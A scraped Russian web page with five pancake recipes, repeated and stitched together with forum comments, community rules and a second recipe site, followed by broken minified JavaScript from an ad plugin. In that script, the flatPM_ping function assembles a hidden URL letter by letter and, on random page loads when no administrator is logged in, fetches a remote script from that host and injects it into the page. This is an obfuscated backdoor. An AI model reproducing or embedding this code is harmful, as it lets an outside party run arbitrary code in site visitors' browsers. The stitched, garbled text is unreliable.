Панкейки на воде

5 рецептов панкейков для завтрака и полдника в закладки 11

Если хочешь, чтоб твои домашние не пропускали завтрак, скорее приготовь им панкейки. Эти толстые пышные блинчики, по структуре и вкусу напоминающие бисквит, влюбляют в себя уже с первого кусочка, а готовятся очень просто и без возни. Основное правило — пеки эту вкуснятину на разогретой без растительного масла сковороде!

Панкейки — традиционное блюдо Северной Америки, популярное как в США, так и в Канаде. В этих странах панкейки — это неотъемлемая часть завтрака. Однако и жители других континентов давно оценили их по достоинству — сегодня эта вкусная выпечка входит в меню кафе и ресторанов по всему миру.

©

Теперь никто завтрак не пропустит! На приготовление этой вкуснятины понадобится минимум времени.

Панкейки на молоке

Самый распространенный вариант приготовления панкейков — на основе молока. Этот рецепт один из самых простых. Так что, если ты никогда не пекла панкейки, советую начать именно с него.

Если ты сладкоежка, то сахара можно добавлять 2 столовые ложки. Ну а для тех, кто собирается есть их с мёдом, стоит добавить в тесто всего 1 столовую ложку сахара.

ИНГРЕДИЕНТЫ

  • 1 ст. муки
  • 1 ст. молока
  • 1 яйцо
  • 1 ч. л. разрылителя
  • 1–2 ст. л. сахара
  • ванилин
  • щепотка соли

ПРИГОТОВЛЕНИЕ

  1. В глубокой миске смешай молоко с яйцом и сахаром. Добавь немного ванилина и щепотку соли. Хорошенько перемешай всё венчиком до однородности.
  2. Добавь разрыхлитель и просеянную муку. Перемешай.
  3. Разогрей сковороду и при помощи половника на сухую сковородку выложи определенное количество теста.
  4. Как только поверхность выпечки начнет пузыриться, необходимо аккуратно перевернуть и продолжить печь.
  5. Готовь панкейки с обратной стороны не более одной минуты на огне выше среднего до желто-румяного цвета.

Панкейки на воде

Если вдруг у тебя не нашлось молока в холодильнике, не отчаивайся, приготовь эти панкейки на воде. Они ничуть не хуже! Такие же пышные, нежные и вкусные.

ИНГРЕДИЕНТЫ

  • 260 г муки
  • 2 ч. л. разрыхлителя
  • 2 яйца
  • 40 г сахара
  • 10 г ванильного сахара
  • 250 мл воды
  • щепотка соли

ПРИГОТОВЛЕНИЕ

  1. Отдели белки от желтков. В глубокой миске смешай желтки с сахаром, ванильным сахаром и водой. Перемешай венчиком до однородности.
  2. Добавь муку и разрыхлитель, снова хорошенько перемешай.
  3. В отдельной емкости смешай белки с щепоткой соли.
  4. Чтобы американские блинчики были пышные, аккуратно вмешивай взбитые белки в тесто, движениями ложки снизу вверх.
  5. Разогрей сковороду с антипригарным покрытием и аккуратно ложкой выкладывай тесто.
  6. Жарь панкейки по 1–2 минуты с каждой стороны на слабом огне.

Соленые панкейки

Панкейки со шпинатом — соленый собрат классических сладких панкейков. Панкейки со шпинатом отлично подойдут к первым блюдам, их можно с соусами и просто со сметаной.

ИНГРЕДИЕНТЫ

  • 200 мл молока
  • 1 яйцо
  • 200 г сметаны
  • 120 г шпината
  • 1 ч. л. сахара
  • 220–250 г муки
  • 1 ст. л. подсолнечного масла
  • 1 ч. л. разрыхлителя
  • 0,5 ч. л. соли
  • щепотка соды

ПРИГОТОВЛЕНИЕ

  1. В удобной емкости смешай яйцо, сметану, масло, соль и сахар. Перемешай венчиком до однородности. Вместо сметаны можно взять густой йогурт.
  2. Добавь молоко и шпинат. Если шпинат замороженный, то перед добавлением его нужно разморозить. Измельчи шпинат при помощи погружного блендера. Перемешай.
  3. Добавь муку, смешанную с разрыхлителем и содой. Снова перемешай.
  4. Выпекай шпинатные панкейки на сухой сковороде на малом огне с двух сторон до готовности. Как только увидишь на поверхности пузырьки, переворачивай и пеки с другой стороны.
  5. Готовые панкейки выкладывай на решетку и в таком виде дай им остыть.

Панкейки с кусочками ягод

Интересная вариация сладких панкейков. Причем она подойдет для любой поры года, так как ягоды можно использовать как свежие, так и замороженные. Кстати, по аналогии с ягодами можно добавлять в тесто какао, кофе, цедру лимона и даже листья зеленого чая.

ИНГРЕДИЕНТЫ

  • 250 мл молока
  • 180 г муки
  • 1 ч. л. соды
  • 1 ч. л. разрыхлителя
  • 1 яйцо
  • 60 г сахара
  • 100 г замороженных ягод

ПРИГОТОВЛЕНИЕ

  1. В удобной емкости смешай все сухие ингредиенты: сода, разрыхлитель, сахар и муку. Хорошенько перемешай.
  2. В другой миске перемешай молоко с яйцом, постепенно влей в миску с сухими ингредиентами. Должно получиться достаточно крутое тесто. Если тесто вышло жидкое, добавь еще немного муки.
  3. Из ягод сделай джем и добавь около столовой ложки в тесто. Оно может получиться немного фиолетового цвета с кусочками ягод.
  4. Хорошо разогрей сковородку с антипригарным покрытием, вылей в нее тесто (около 1–2 столовых ложек на 1 панкейк) и жарь до появления пузырьков, затем переворачивай.
  5. Панкейки отлично впитывают различные джемы и соусы, поэтому полей их джемом или шоколадным соусом по вкусу. Приятного аппетита!

Кофейные панкейки

Любителям кофе особенно придется по вкусу этот интересный рецепт! Подавать панкейки можно с любым соусом, вареньем или сметаной. Выбирай любимый и щедро поливай сверху. Кружка теплого напитка — и вот оно, идеальное утро!

ИНГРЕДИЕНТЫ

  • 240 г муки
  • 1 ст. л. кофе-порошка
  • 2 ст. л. мелкого сахара
  • 30 г сливочного масла
  • 1 яйцо
  • 250 г молока
  • 1 ч. л. разрыхлителя
  • щепотка соли

ПРИГОТОВЛЕНИЕ

  1. В глубокой миске смешай муку, растворимый кофе, сахар, разрыхлитель, щепотку соли. Хорошенько всё перемешай до однородности.
  2. Растопи сливочное масло и перелей его к сухим ингредиентам. Добавь молоко и яйцо. Взбей всё миксером или венчиком. Тесто по консистенции должно напоминать густую сметану.
  3. Прогрей антипригарную сковороду, маслом не смазывай. Аккуратно вылей столовой ложкой тесто на сковороду. Когда сверху начнут появляться пузырьки-дырочки, значит, можно переворачивать панкейки.
  4. На второй стороне обжаривай до румяности. Перекладывай в тарелку и готовь следующие панкейки.

Только не давай им остывать, эти американские блинчики должны съедаться горячими! Подавать их можно с бананом и мёдом или просто с вареньем. Ну а мои дети любят их есть в сочетании с шоколадом, орешками и бананом. Обязательно попробуй, ведь это так вкусно!

Панкейки на воде

Предлагаем рецепт обалденно вкусных и простых в приготовлении панкейков на воде. Если вдруг у вас не нашлось молока в холодильнике – не отчаивайтесь, приготовьте эти панкейки на воде. Они ничуть не хуже! Такие же пышные, нежные и вкусные. Только не давайте им остывать, эти американские блинчики должны съедаться горячими! Подавать их можно с бананом и мёдом или просто с вареньем. Приятного завтрака!

Разрыхлитель – 2 ч. л.

Ванильный сахар – 10 г

Соль – 1 щепотка

1. Смешать муку с разрыхлителем и отставить в сторону.

2. Отделить белки 2х яиц от желтком.

3. К желткам добавить сахар, ванильный сахар и воду, хорошо перемешать.

4. В получившуюся смесь постепенно всыпаем муку с разрыхлителем и тщательно перемешиваем.

5. Теперь взбиваем белки с щепоткой соли.

6. Вмешиваем взбитые белки в наше тесто.

7. Жарить панкейки нужно по 1-2 минуты с каждой стороны.

Из данного количества ингредиентов получится где-то 9 панкейков.

Рецепт с пошаговыми фото здесь

Найдены возможные дубликаты

Сколько сколько разрыхлителя? Не дохрена ли? Раза так в два?

Это да, холодными эти самые панкейки не съешь – невкусно. Только горячими, с мёдом, вареньем, кленовым сиропом. Суховатые они. Я уж лучше пожарю на масле блинчики или оладушки на дрожжах или на кефире. Извини, ТС, но наши блинчики съедаются быстро и горячими, и холодными (если остались) и с вареньем, и с селёдкой (да-да, очень вкусно!), и вообще без всего. А панкейки, кстати, больше даже смахивают на кексы или бисквиты, мне кажется.

Какой силы огонь должен быть?

Т.к. тут сказано 1-2 минуты жарки, то, я так понимаю, сильный или выше среднего?

средний, можно чуть меньше среднего.

Панкейк головного мозга:) Блинчики это, блинчики! Ну, или большие оладушки.

О сообществе

Открытое сообщество, посвященное кулинарному творчеству. В сообществе будут выкладываться рецепты блюд, длиннопосты с фоторецептами, видео рецепты, вкусовые сочетания продуктов, работы и советы от шеф поваров, статьи о продуктах, блюдах и их происхождении, кулинарные приемы для повседневной жизни от сложных до простых, кулинарный юмор.

Если у вас есть вопросы по выбору посуды, сервировке, проверке качества продуктов, вкусовых совместимостях и др. тематические, можете смело оставлять их в сообществе.

1) Запрещается оставлять сообщения, носящие рекламный (в любой степени) характер и не связанные с брендом.

2) Запрещается размещать сообщения о продаже и перепродаже любых товаров и услуг; размещать ссылки на интернет-ресурсы и/или файлы, содержащие в себе информацию рекламного характера, не связанную с брендом.

3) Запрещается создавать темы и сообщения, провоцирующие пользователей на нарушения настоящих Правил.

4) Запрещается прямое или косвенное оскорбление участников сообщества и администрации.

5) Запрещается выкладывать фото/видео материалы приготовления блюд со сторонних ресурсов. Чтобы исключить плагиат в конце поста прикрепляем фото с готовым блюдом и на листочке имя вашего аккаунта с пометкой для Кулинарной Мастерской или КМ. Посты игнорирующие это правило будут перенесены в общую ленту.

6) Пост видео без подробного текстового рецепта будет перемещён в общую ленту.

7) При оформлении юмористического контента необходимо указывать хештег Кулинарный юмор .

8) Для внесения предложений, критики и других вопросов, писать с пометкой @admoders .

Панкейки на воде

Даже если у вас в доме не оказалось молока или кефира, вы можете приготовить нежные и ароматные панкейки на воде по этому простому рецепту.

Ингредиенты

  • 120-150 гр муки
  • 120 мл воды (желательно сильногазированной, но можно и обычной)
  • 1 яйцо
  • 1 ст.л. оливкового или подсолнечного масла
  • 2-3 ч.л. сахара
  • 5 гр ванильного сахара или крупная щепотка ванилина
  • 3/4 ч.л. разрыхлителя для теста
  • 1/4 ч.л. соли

Рецепт приготовления блюда в домашних условиях

  1. Муку просеять через сито в одну миску вместе с разрыхлителем, солью, ванилином или ванильным сахаром.
  2. Яичный желток соединить с водой и взболтать вилкой до однородности, белок убрать на пару минут в морозилку.
  3. Соединить желтковую смесь с сухими ингредиентами и вымешать до однородности. Белок взбить миксером на высоких оборотах до устойчивых пиков и всыпать в конце сахар.
  4. Подмешать белковый крем к тесту аккуратными движениями сверху вниз. Сковороду поставить на сильный огонь и хорошенько ее разогреть. Добавить в тесто на воде ложку растительного масла и перемешать.
  5. Влить по центру сковороду пару ложек теста (не наклонять сковороду и не давать ему растекаться). Прожарить панкейк с обеих сторон до легкой румяности и переложить на блюдо, накрыть миской или глубокой тарелкой.
  6. Таким образом прожарить все остальные панкейки и подавать к столу сразу после приготовления, полив медом, джемом, вареньем или сгущенкой. Приятного аппетита!

Похожие рецепты:

Оладьи на йогурте

Панкейки на сыворотке

Панкейки на воде

Тыквенные оладьи с творогом

Оладьи из цветной капусты

Ваши отзывы и советы

Новое на сайте:

К сезону десертов:

120 мин. / Средне

480 мин. / Сложно

480 мин. / Средне

120 мин. / Средне

480 мин. / Средне

Мы в соцсетях

FOODideas (идеи для еды) – это сайт, посвящённый искусству приготовления пищи дома, где собраны лучшие рецепты кулинарных блюд с фотографиями и подробными пошаговыми инструкциями, специально, чтобы вы могли приготовить любое, даже самое сложное блюдо в домашних условиях. Так же наши рецепты вы можете читать в нашем Яндекс Дзен канале – Foodideas Zen

Подборка рецептов панкейков для завтрака и полдника

Метки

Если хочешь, чтоб твои домашние не пропускали завтрак, скорее приготовь им панкейки. Эти толстые пышные блинчики, по структуре и вкусу напоминающие бисквит, влюбляют в себя уже с первого кусочка, а готовятся очень просто и без возни. Основное правило — пеки эту вкуснятину на разогретой без растительного масла сковороде!

Панкейки — традиционное блюдо Северной Америки, популярное как в США, так и в Канаде. В этих странах панкейки — это неотъемлемая часть завтрака. Однако и жители других континентов давно оценили их по достоинству — сегодня эта вкусная выпечка входит в меню кафе и ресторанов по всему миру.

© Depositphotos

Панкейк в домашних условиях

Сегодня редакция «Так Просто!» подготовила для тебя 5 проверенных рецептов панкейков. Теперь никто завтрак не пропустит! На приготовление этой вкуснятины понадобится минимум времени.

© Depositphotos

Панкейки на молоке

Самый распространенный вариант приготовления панкейков — на основе молока. Этот рецепт один из самых простых. Так что, если ты никогда не пекла панкейки, советую начать именно с него.

Если ты сладкоежка, то сахара можно добавлять 2 столовые ложки. Ну а для тех, кто собирается есть их с мёдом, стоит добавить в тесто всего 1 столовую ложку сахара.

© Depositphotos

Ингредиенты

  • 1 ст. муки
  • 1 ст. молока
  • 1 яйцо
  • 1 ч. л. разрылителя
  • 1–2 ст. л. сахара
  • ванилин
  • щепотка соли

Приготовление

  1. В глубокой миске смешай молоко с яйцом и сахаром. Добавь немного ванилина и щепотку соли. Хорошенько перемешай всё венчиком до однородности.
  2. Добавь разрыхлитель и просеянную муку. Перемешай.
  3. Разогрей сковороду и при помощи половника на сухую сковородку выложи определенное количество теста.
  4. Как только поверхность выпечки начнет пузыриться, необходимо аккуратно перевернуть и продолжить печь.
  5. Готовь панкейки с обратной стороны не более одной минуты на огне выше среднего до желто-румяного цвета.

Панкейки на воде

Если вдруг у тебя не нашлось молока в холодильнике, не отчаивайся, приготовь эти панкейки на воде. Они ничуть не хуже! Такие же пышные, нежные и вкусные.

© Depositphotos

Ингредиенты

  • 260 г муки
  • 2 ч. л. разрыхлителя
  • 2 яйца
  • 40 г сахара

Приготовление

  1. Отдели белки от желтков. В глубокой миске смешай желтки с сахаром, ванильным сахаром и водой. Перемешай венчиком до однородности.
  2. Добавь муку и разрыхлитель, снова хорошенько перемешай.
  3. В отдельной емкости смешай белки с щепоткой соли.
  4. Чтобы американские блинчики были пышные, аккуратно вмешивай взбитые белки в тесто, движениями ложки снизу вверх.
  5. Разогрей сковороду с антипригарным покрытием и аккуратно ложкой выкладывай тесто.
  6. Жарь панкейки по 1–2 минуты с каждой стороны на слабом огне.

Соленые панкейки

Панкейки со шпинатом — соленый собрат классических сладких панкейков. Панкейки со шпинатом отлично подойдут к первым блюдам, их можно с соусами и просто со сметаной.

© Depositphotos

Ингредиенты

  • 200 мл молока
  • 1 яйцо
  • 200 г сметаны
  • 120 г шпината
  • 1 ч. л. сахара
  • 220–250 г муки

Приготовление

  1. В удобной емкости смешай яйцо, сметану, масло, соль и сахар. Перемешай венчиком до однородности. Вместо сметаны можно взять густой йогурт.
  2. Добавь молоко и шпинат. Если шпинат замороженный, то перед добавлением его нужно разморозить. Измельчи шпинат при помощи погружного блендера. Перемешай.
  3. Добавь муку, смешанную с разрыхлителем и содой. Снова перемешай.
  4. Выпекай шпинатные панкейки на сухой сковороде на малом огне с двух сторон до готовности. Как только увидишь на поверхности пузырьки, переворачивай и пеки с другой стороны.
  5. Готовые панкейки выкладывай на решетку и в таком виде дай им остыть.

Панкейки с кусочками ягод

Интересная вариация сладких панкейков. Причем она подойдет для любой поры года, так как ягоды можно использовать как свежие, так и замороженные. Кстати, по аналогии с ягодами можно добавлять в тесто какао, кофе, цедру лимона и даже листья зеленого чая.

© Depositphotos

Ингредиенты

  • 250 мл молока
  • 180 г муки
  • 1 ч. л. соды
  • 1 ч. л. разрыхлителя
  • 1 яйцо
  • 60 г сахара

Приготовление

  1. В удобной емкости смешай все сухие ингредиенты: сода, разрыхлитель, сахар и муку. Хорошенько перемешай.
  2. В другой миске перемешай молоко с яйцом, постепенно влей в миску с сухими ингредиентами. Должно получиться достаточно крутое тесто. Если тесто вышло жидкое, добавь еще немного муки.
  3. Из ягод сделай джем и добавь около столовой ложки в тесто. Оно может получиться немного фиолетового цвета с кусочками ягод.
  4. Хорошо разогрей сковородку с антипригарным покрытием, вылей в нее тесто (около 1–2 столовых ложек на 1 панкейк) и жарь до появления пузырьков, затем переворачивай.
  5. Панкейки отлично впитывают различные джемы и соусы, поэтому полей их джемом или шоколадным соусом по вкусу. Приятного аппетита!

Кофейные панкейки

Любителям кофе особенно придется по вкусу этот интересный рецепт! Подавать панкейки можно с любым соусом, вареньем или сметаной. Выбирай любимый и щедро поливай сверху. Кружка теплого напитка — и вот оно, идеальное утро!

© Depositphotos

Ингредиенты

  • 240 г муки
  • 1 ст. л. кофе-порошка
  • 2 ст. л. мелкого сахара
  • 30 г сливочного масла
  • 1 яйцо
  • 250 г молока
  • 1 ч. л. разрыхлителя
  • щепотка соли

Приготовление

  1. В глубокой миске смешай муку, растворимый кофе, сахар, разрыхлитель, щепотку соли. Хорошенько всё перемешай до однородности.
  2. Растопи сливочное масло и перелей его к сухим ингредиентам. Добавь молоко и яйцо. Взбей всё миксером или венчиком. Тесто по консистенции должно напоминать густую сметану.
  3. Прогрей антипригарную сковороду, маслом не смазывай. Аккуратно вылей столовой ложкой тесто на сковороду. Когда сверху начнут появляться пузырьки-дырочки, значит, можно переворачивать панкейки.
  4. На второй стороне обжаривай до румяности. Перекладывай в тарелку и готовь следующие панкейки.

Совет редакции

Также предлагаю тебе ознакомиться с 30 рецептами блюд из яиц, которые обязательно нужно попробовать. Эти простые блюда осилит даже начинающий кулинар, ведь для их приготовления не нужно ни редких продуктов, ни профессиональных приспособлений, ни отточенных годами умений. Просто сверяйся с рецептами и готовь в свое удовольствие.

© Depositphotos

Только не давай им остывать, эти американские блинчики должны съедаться горячими! Подавать их можно с бананом и мёдом или просто с вареньем. Ну а мои дети любят их есть в сочетании с шоколадом, орешками и бананом. Обязательно попробуй, ведь это так вкусно!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Оцените рецепт ОценитьПрименить